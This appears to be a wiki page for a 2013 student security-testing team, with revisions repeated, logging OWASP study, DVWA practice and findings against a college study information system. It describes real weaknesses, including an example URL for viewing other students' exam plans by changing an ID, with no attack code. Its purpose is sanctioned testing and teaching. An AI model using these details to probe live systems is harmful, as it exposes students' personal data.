** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===
* '''What I did like:'''
** Working in a team on a real-life problem.
** Practising problem-solving and working as a team.
** Learned a lot of new stuff.
** Organisation - well done
** Had a wonderful team!

* '''What I did not like:'''
** A couple of days short of time - as usual...

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===
* '''What I did like:'''
** It was nice to meet new people and get new friends from different cultures.
** Also all the events that was arranged were very funny, specially sauna-event!
** Visiting Skype office was something that you don’t get to do everyday!
** Free food!
** Everything was well organized and teachers were truly interested about this intensive course!

* '''What I did not like:'''
** Too long studying/working days.

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===
* '''What I did like:'''
** Accommodation
** The equipment we used
** The capabilities and expertise of the professors
** The overall quality of teaching
** The expected learning outcomes
** The activities besides the general course
** Friendly environment
** Working in teams. Thanks guys!
** Free water
** Tasty food

* '''What I did not like:'''
** To long working hours

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T08:39:51Z

Saus: /* Feedback from Tomas Lepistö */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===
* '''What I did like:'''
** Working in a team on a real-life problem.
** Practising problem-solving and working as a team.
** Learned a lot of new stuff.
** Organisation - well done
** Had a wonderful team!

* '''What I did not like:'''
** A couple of days short of time - as usual...

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===
* '''What I did like:'''
** It was nice to meet new people and get new friends from different cultures.
** Also all the events that was arranged were very funny, specially sauna-event!
** Visiting Skype office was something that you don’t get to do everyday!
** Free food!
** Everything was well organized and teachers were truly interested about this intensive course!

* '''What I did not like:'''
** Too long studying/working days.

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T08:37:53Z

Saus: /* Feedback from Sandra Suviste */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
